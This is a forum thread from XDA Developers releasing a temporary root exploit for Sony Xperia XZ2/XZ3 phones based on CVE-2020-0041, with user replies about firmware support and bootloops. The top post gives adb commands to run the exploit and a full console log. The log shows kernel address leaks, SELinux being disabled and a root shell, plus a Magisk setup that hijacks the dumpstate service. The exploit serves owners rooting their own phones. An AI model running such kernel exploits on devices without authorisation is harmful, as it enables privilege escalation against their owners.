• Introducing XDA Computing: Discussion zones for Hardware, Software, and more!    Check it out!

[XZ2/XZ2c/XZ2p/XZ3] temp root exploit via CVE-2020-0041 including magisk setup

Search This thread

cyrup

New member
Nov 12, 2021
2
0
Sony Xperia XZ2 Premium
Hi guys, anyone tried using xz2 premium dual firmware that is provided here for the single sim?
I can't find a link for this build 52.1.A.0.618 for single sim. I want to temproot my XZ2 Premium.
 

difkey

New member
Nov 25, 2021
1
0
Hi, j4nn.
Already asked before - can you make an update for SO-05K (XZ2 Compact Docomo) support?
I understand that the exploit only works with an identical kernel image.
I understand that this exploit is for tama platform.
I have Xperia XZ2compact Japanese version SO-05K too.
I tried to test the exploit.
Naturally, after trying to execute the exploit, it became clear that it was not supported for this firmware.
I found downloadable android 10 firmware - SO-05K_NTT DoCoMo JP_52.0.B.9.316-R11B
Can it be exploited?
Can you explain what changes need to be made in exploit for it to work for firmware SO-05K_NTT DoCoMo?
Kernel image is available at Goole drive: here
 

didine7607

Member
Apr 15, 2012
7
0
Hi everyone, i have xz3 dual sim H9436, so i downloaded the fw posted here as it's recommanded to use temperoot, i just wanted to install pixel launcher so i can use gestures feature ...the installation of the fw went flowlessly no problem at all, but when i temperooted and installed the folders of pixel launcher on oem folder then reboot, my phone freezes everytime when xperia is about to display, it restarts then reboot when xperia shows up over and over, ( FYI in the past i unlocked my bootloader in hope to root it and install custom roms, but after i unlocked it, i wasn't able to root it because there's simply no way to do so with xz3) so now i'm posting here hoping to find some help please :(
 

mak6021

Senior Member
Nov 26, 2016
67
21
39
Polotsk
Hi everyone, i have xz3 dual sim H9436, so i downloaded the fw posted here as it's recommanded to use temperoot, i just wanted to install pixel launcher so i can use gestures feature ...the installation of the fw went flowlessly no problem at all, but when i temperooted and installed the folders of pixel launcher on oem folder then reboot, my phone freezes everytime when xperia is about to display, it restarts then reboot when xperia shows up over and over, ( FYI in the past i unlocked my bootloader in hope to root it and install custom roms, but after i unlocked it, i wasn't able to root it because there's simply no way to do so with xz3) so now i'm posting here hoping to find some help please :(
Not something complicated to get Root Magisk, just patch boot and boot via fastboot if you want give instructions, but I need your boot and vbmeta of firmware
 

didine7607

Member
Apr 15, 2012
7
0
Not something complicated to get Root Magisk, just patch boot and boot via fastboot if you want give instructions, but I need your boot and vbmeta of firmware
Thank you, i Just want the Phone to boot after that and get access to gestures. Where can i find my boot and vbmeta of firmeware ? Because i installed the one posted here, download link for H9436 dual sim

Edit:
i'm not sure if these are the files you asked for, i found them on main folder after extracting the 3 zips, and the boot from boot zip
https://drive.google.com/file/d/1wlZrwxgiPoaWjlrNel0sQNXLpnJqUSl4/view?usp=sharing
https://drive.google.com/file/d/1npIAB9E4mTdGvL7uY3qv54R1FlF63AM6/view?usp=sharing
 
Last edited:

mak6021

Senior Member
Nov 26, 2016
67
21
39
Polotsk
sorry for double post :/
The second link is wrong!! Okay if you have this version, follow the instructions below.
Connect the phone in fastboot mode (Turn off the phone, hold down the volume key \ + \ and without releasing it, connect the smartphone to the computer, wait for the blue LED to light up, then you can release the key). Open the files one by one (after opening and executing the command, they close themselves) 1vbmeta.cmd -> 2boot.cmd -> 3dtbo.cmd -> 4reboot.cmd ... Good luck
 

Attachments

  • 52.1.А.3.137.rar
    26.7 MB · Views: 20

didine7607

Member
Apr 15, 2012
7
0
The second link is wrong!! Okay if you have this version, follow the instructions below.
Connect the phone in fastboot mode (Turn off the phone, hold down the volume key \ + \ and without releasing it, connect the smartphone to the computer, wait for the blue LED to light up, then you can release the key). Open the files one by one (after opening and executing the command, they close themselves) 1vbmeta.cmd -> 2boot.cmd -> 3dtbo.cmd -> 4reboot.cmd ... Good luck
Thank you very much 🙏. Will try it tomorrow, just one question : is this supposed to get rid of bootloop ? Or to root ? And if it's the first answer, can i still boot and find the pixel launcher ?
 

didine7607

Member
Apr 15, 2012
7
0
Thank you very much 🙏. Will try it tomorrow, just one question : is this supposed to get rid of bootloop ? Or to root ? And if it's the first answer, can i still boot and find the pixel launcher ?
i'm trying to do exactly what you told me, but nothing happen when i click on each command, am i doing something wrong ?
 

didine7607

Member
Apr 15, 2012
7
0
i'm trying to do exactly what you told me, but nothing happen when i click on each command, am i doing something wrong ?
nvm, it was drivers issues, i managed to install all the 4 scripts, the phone rebooted, this time it went a little bit further, at first it was restarting at "exper..." now i can see xperia fully on screen for couple of seconds, then bootloop...please, help me to fix it
 

goriath

Member
May 18, 2013
11
1
I hope to see a reply to my post since the topic seems become a minor trend and the autor more likely has other things to do in life, BTW...

I have an Xperia XZ2 compact (H8314), stock, unbranded, CustomIT region, with Vodafone sim card (I live in Italy) - latest Android 10 sony ROM installed 52.1.A.3.49

All I wanted (...for xmas) was VoLTE, since my carrier provide the service, although the phone isn't listed in their "Very Important Phone" list (actually no SONY device is listed). It's vital for me get VoLTE since my carrier has removed 3G and 2G coverage is getting worse - so no 4G in my case means no inbound/outbound calls at all...
If I don't manage to solve the problem, more likely I'm going to change the carrier rather the phone, but that's not the point...

The question:
With the info in the OP would be possibile...(?):

-Downgrade to a target fw (since mine isn't supported)
-Temp root the phone
-Install a custom recovery (TWRP) w/o UBL
-Then upgrade to major release again
-Mod the phone in order to support VoLTE (by editing build.prop like I have heard...) ???

Or there is something I miss?

I spent the last 3 days seeking and reading for a strategy but everything seems to be about unlocking the BL at some point and I don't want to (you know the reason....I read in this thread that even if you could temp root the phone to backup locked/unlocked TA partitions, with DRM keys intact in order to restore them later, the phone is not going to accept keys anymore...)

Many thanks
 

mirhl

Senior Member
Oct 15, 2012
3,089
1,159
Build.prop isn't gonna get you anywhere.
It's not a problem with your phone, but the carrier (which is certainly a joke when it can certify super cheap alcatels and 6yo lumias, but not xperias)


To be sure there's nothing you can't do if you unlock the booloader (even though, I don't really know how much work it could still entail). But there's some small chance you could still manage to pull it off with just temp root and QPST, maybe.
This isn't really the right thread though.
 

Top Liked Posts

  • There are no posts matching your filters.
  • 31
    temp root exploit for sony xperia XZ2/XZ2c/XZ2p/XZ3 with android 10 firmware
    including temporal magisk setup from the exploit


    The exploit uses CVE-2020-0041 originally designed for Pixel 3 running kernel 4.9.
    I have adapted the Pixel 3 specific exploit for kernel 4.9 that is used with sony TAMA platform phones running Android 10 with February 2020 security patch level.

    SUPPORTED TARGETS
    This has been tested only with xperia XZ2 H8216-52.1.A.0.618 target, but support for other targets have been implemented based on analysis of each kernel image from target firmware.
    Please note, it is unlikely that any other fw version than those listed above would work.
    The only (unlikely) case when the exploit could work with different fw version (or different phone model) would be that they would use binary identical kernel image in the firmware.

    USAGE HOWTO INCLUDING MAGISK SETUP
    • be sure to run supported firmware version on your phone (you may need to downgrade, involving factory reset)
    • enable developer mode options and in there adb debugging (eventually install adb drivers)
    • download the tama-mroot.zip with the exploit attached in this post
    • download Magisk-v20.4.zip from magisk releases page on github here
    • use 'adb push tama-mroot.zip Magisk-v20.4.zip /data/local/tmp' to copy the zips to the phone
    • unzip and prepare magisk setup with following commands in 'adb shell'
      Code:
      cd /data/local/tmp
      unzip tama-mroot.zip
      chmod 755 tama-mroot magisk-setup.sh magisk-start.sh
      ./magisk-setup.sh
    • get temp root and start magisk up with following commands in 'adb shell':
      Code:
      cd /data/local/tmp
      ./tama-mroot
      ./magisk-start.sh -1
      ./magisk-start.sh -2
      ./magisk-start.sh -3

    If it worked, you should see something like this:

    Code:
    H8216:/ $ cd /data/local/tmp
    H8216:/data/local/tmp $ ./tama-mroot                                                                                                                                                                            
    [+] Detected H8216-52.1.A.0.618 target
    [+] Mapped 200000
    [+] selinux_enforcing before exploit: 1
    [+] pipe file: 0xffffffd07822fa00
    [+] file epitem at ffffffd102da6d00
    [+] Reallocating content of 'write8_inode' with controlled data...............[DONE]
    [+] Overwriting 0xffffffd07822fa20 with 0xffffffd102da6d50...[DONE]
    [+] Write done, should have arbitrary read now.
    [+] file operations: ffffff9dee01ebf8
    [+] kernel base: ffffff9dece80000
    [+] Reallocating content of 'write8_selinux' with controlled data..[DONE]
    [+] Overwriting 0xffffff9def290000 with 0x0...[DONE]
    [+] init_cred: ffffff9def02fcd0
    [+] memstart_addr: 0xfffffff040000000
    [+] First level entry: ae7f6003 -> next table at ffffffd06e7f6000
    [+] Second level entry: ae419003 -> next table at ffffffd06e419000
    [+] sysctl_table_root = ffffff9def05c710
    [+] Reallocating content of 'write8_sysctl' with controlled data.......[DONE]
    [+] Overwriting 0xffffffd1316fc268 with 0xffffffd0ba748000...[DONE]
    [+] Injected sysctl node!
    [+] Node write8_inode, pid 7109, kaddr ffffffd0c1193700
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Node write8_selinux, pid 6726, kaddr ffffffd08bfeb400
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Node write8_sysctl, pid 6772, kaddr ffffffd0afc0d000
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Cleaned up sendmsg threads
    [+] epitem.next = ffffffd07822fa20
    [+] epitem.prev = ffffffd07822fad8
    [+] Launching privileged shell
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -1                                                                                                                                                    
    + FRESH=false
    + '[' -1 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + ./magiskpolicy --live --magisk 'allow dumpstate * * *'
    Load policy from: /sys/fs/selinux/policy
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -2                                                                                                                                                    
    + FRESH=false
    + '[' -2 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + STAGE=2
    + '[' 2 '=' 2 ']'
    + mount -t tmpfs -o 'mode=755' none /sbin
    + chcon u:object_r:rootfs:s0 /sbin
    + chmod 755 /sbin
    + cp -a magisk/boot_patch.sh /sbin
    + cp -a magisk/magiskboot /sbin
    + cp -a magisk/magiskinit64 /sbin
    + cp -a magisk/busybox /sbin
    + cp -a magisk/util_functions.sh /sbin
    + cd /sbin
    + chmod 755 boot_patch.sh busybox magiskboot magiskinit64 util_functions.sh
    + mkdir r
    + mount -o bind / r
    + cp -a r/sbin/. /sbin
    + umount r
    + rmdir r
    + mv magiskinit64 magiskinit
    + ./magiskinit -x magisk magisk
    + ln -s /sbin/magiskinit /sbin/magiskpolicy
    + ln -s /sbin/magiskinit /sbin/supolicy
    + false
    + chcon -R u:object_r:magisk_file:s0 /data/adb/magisk
    + rm -f magiskboot util_functions.sh boot_patch.sh
    + ln -s /sbin/magisk /sbin/su
    + ln -s /sbin/magisk /sbin/resetprop
    + ln -s /sbin/magisk /sbin/magiskhide
    + mkdir /sbin/.magisk
    + chmod 755 /sbin/.magisk
    + >/sbin/.magisk/config
    + echo 'KEEPVERITY=true'
    + >>/sbin/.magisk/config
    + echo 'KEEPFORCEENCRYPT=true'
    + chmod 000 /sbin/.magisk/config
    + mkdir -p /sbin/.magisk/busybox
    + chmod 755 /sbin/.magisk/busybox
    + mv busybox /sbin/.magisk/busybox
    + mkdir -p /sbin/.magisk/mirror
    + chmod 000 /sbin/.magisk/mirror
    + mkdir -p /sbin/.magisk/block
    + chmod 000 /sbin/.magisk/block
    + mkdir -p /sbin/.magisk/modules
    + chmod 755 /sbin/.magisk/modules
    + mkdir -p /data/adb/modules
    + chmod 755 /data/adb/modules
    + mkdir -p /data/adb/post-fs-data.d
    + chmod 755 /data/adb/post-fs-data.d
    + mkdir -p /data/adb/service.d
    + chmod 755 /data/adb/service.d
    + chcon -R -h u:object_r:rootfs:s0 /sbin/.magisk
    + chcon u:object_r:magisk_file:s0 /sbin/.magisk/busybox/busybox
    + /sbin/magisk --daemon
    client: launching new main daemon process
    + pidof magiskd
    + MP=14148
    + '[' -z 14148 ']'
    + >/sbin/.magisk/escalate
    + echo 14148
    + '[' -e /sbin/.magisk/escalate ']'
    + sleep 1
    + '[' -e /sbin/.magisk/escalate ']'
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -3                                                                                                                                                    
    + FRESH=false
    + '[' -3 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + STAGE=3
    + '[' 3 '=' 2 ']'
    + >/sbin/.magisk/magiskd
    + echo -e '#!/system/bin/sh\n/sbin/magisk --daemon'
    + chmod 755 /sbin/.magisk/magiskd
    + chcon u:object_r:dumpstate_exec:s0 /sbin/.magisk/magiskd
    + getprop init.svc.dumpstate
    + SVC=''
    + timeout=10
    + '[' 10 -gt 0 ']'
    + stop dumpstate
    + killall -9 magiskd
    + stop dumpstate
    + mount -o bind /sbin/.magisk/magiskd /system/bin/dumpstate
    + start dumpstate
    + timeout=10
    + '[' 10 -le 0 ']'
    + pidof magiskd
    + MP=14165
    + '[' -n 14165 ']'
    + break
    + stop dumpstate
    + sleep 1
    + umount /system/bin/dumpstate
    + rm -f /sbin/.magisk/magiskd
    + '[' '' '=' running ']'
    + rm -f /dev/.magisk_unblock
    + /sbin/magisk --post-fs-data
    + timeout=10
    + '[' -e /dev/.magisk_unblock -o 10 -le 0 ']'
    + sleep 1
    + timeout=9
    + '[' -e /dev/.magisk_unblock -o 9 -le 0 ']'
    + /sbin/magisk --service
    + sleep 1
    + /sbin/magisk --boot-complete
    + chmod 751 /sbin
    root_by_cve-2020-0041:/data/local/tmp # id                                                                                                                                                                      
    uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:magisk:s0
    root_by_cve-2020-0041:/data/local/tmp # uname -a
    Linux localhost 4.9.186-perf+ #1 SMP PREEMPT Fri Jan 17 01:22:05 2020 aarch64
    root_by_cve-2020-0041:/data/local/tmp # getenforce                                                                                                                                                              
    Permissive


    Now you can exit the temp root shell and use 'su' to get a root shell controlled by magisk manager or allow other apps that need root as asking for root permission now works.
    The magisk setup from exploit including working permission asking has been fully developed by me, it uses some novel techniques to overcome the limitations caused by magisk run from a temp root instead of being integrated in boot process as a service.

    Please be careful what you use the temp root for.
    Changing something in partitions protected by dm-verity (or Android Verified Boot 2.0), like for example /system, /vendor or kernel boot image, can result with a not anymore booting phone.
    This is why it is called 'temp root' - you get a root shell only temporarily, it is lost with reboot and it does not allow to make permanent changes in crucial partitions - you would need to unlock bootloader for that.
    Some partitions might still be possible to modify - for example in case of sony xperia xz1 phones it was possible to do permanent debloat via changes in /oem partition and such debloat would survive even factory reset. Similarly some modem configs have been present in /oem allowing to setup IMS for different operators/regions or tune other modem related stuff.

    Please note, this exploit will get you a root shell with still locked TAMA platform phones that could allow to backup TA partition in still locked state, having drm keys (the device key) still there. Backup of TA partition now works with tama-mroot avoiding 'Required key not available' you could experience with previously released tama-root.
    There is currently no known method though how to restore drm functionalities after bootloader unlock even after restoring TA partition from the locked state backup.
    For details please check exploiting xperia XZ2 - good and bad news post and following discussion there.

    SOURCES
    Exploit sources for all releases are available at my github here.

    CREDITS
    Big thanks to Blue Frost Security for the excellent writeup and the exploit itself.

    DONATIONS
    If you like my work, you can donate using the Donate to Me button with several methods there.
    Thank you very much to all who donate.

    DOWNLOAD
    7
    implemented magisk setup from temproot

    finally got magisk from temp root working including permission asking feature - released as tama-mroot.zip - get it here
    5
    CHANGELOG
    • 2020-05-14 : released initial version of tama-root (no magisk support, problem with 'Required key not available' returned from some commands)
    • 2020-05-22 : finally got magisk from temp root working including permission asking feature - released as tama-mroot.zip
    5
    As it seems .618 fw versions get missing from xperifirm, please let me know if you need some - I still have following:
    H8116_Customized IBE_1313-3189_52.1.A.0.618_R3C
    H8166_Customized FR_1313-2540_52.1.A.0.618_R4C
    H8216_Customized UK_1313-4679_52.1.A.0.618_R5C
    H8266_Customized FR_1313-2481_52.1.A.0.618_R4C
    H8296_Customized TW_1313-6119_52.1.A.0.618_R4C
    H8314_Customized FR_1313-2468_52.1.A.0.618_R4C
    H8324_Customized FR_1313-2469_52.1.A.0.618_R2C
    H8416_Customized IBE_1316-6423_52.1.A.0.618_R5C
    H9436_Customized FR_1316-3076_52.1.A.0.618_R6C
    H9493_Customized HK_1316-2331_52.1.A.0.532_R2C
    so I may upload it on request.
    4
    So you did it again! You are insane mate!!
    Respect.